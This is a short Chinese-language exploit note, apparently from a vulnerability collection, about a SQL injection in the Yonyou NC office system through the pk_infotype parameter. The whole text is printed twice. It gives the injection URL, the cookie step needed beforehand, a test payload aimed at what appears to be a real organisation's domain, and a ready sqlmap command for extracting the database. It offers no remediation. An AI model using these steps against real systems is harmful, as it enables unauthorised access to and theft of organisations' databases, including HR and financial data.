VULHUB ™

用友NC综合办公系统SQL注入漏洞，可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库 注入链接：/epp/detail/publishinfomore.jsp?pk_infotype= 注入参数：pk_infotype 必须先访问/epp/index.jsp后产生cookie才能进行SQL注入 测试案例： http://nc.xhlbdc.com  访问首页产生cookie： http://nc.xhlbdc.com/epp/index.jsp  注入链接：http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW'  【SQLMAP注入】 burpsuite抓包保存为nc.xhlbdc.com.txt文件后，使用SQLMAP注入： python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3 

用友NC综合办公系统SQL注入漏洞，可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库 注入链接：/epp/detail/publishinfomore.jsp?pk_infotype= 注入参数：pk_infotype 必须先访问/epp/index.jsp后产生cookie才能进行SQL注入 测试案例： http://nc.xhlbdc.com  访问首页产生cookie： http://nc.xhlbdc.com/epp/index.jsp  注入链接：http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW'  【SQLMAP注入】 burpsuite抓包保存为nc.xhlbdc.com.txt文件后，使用SQLMAP注入： python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3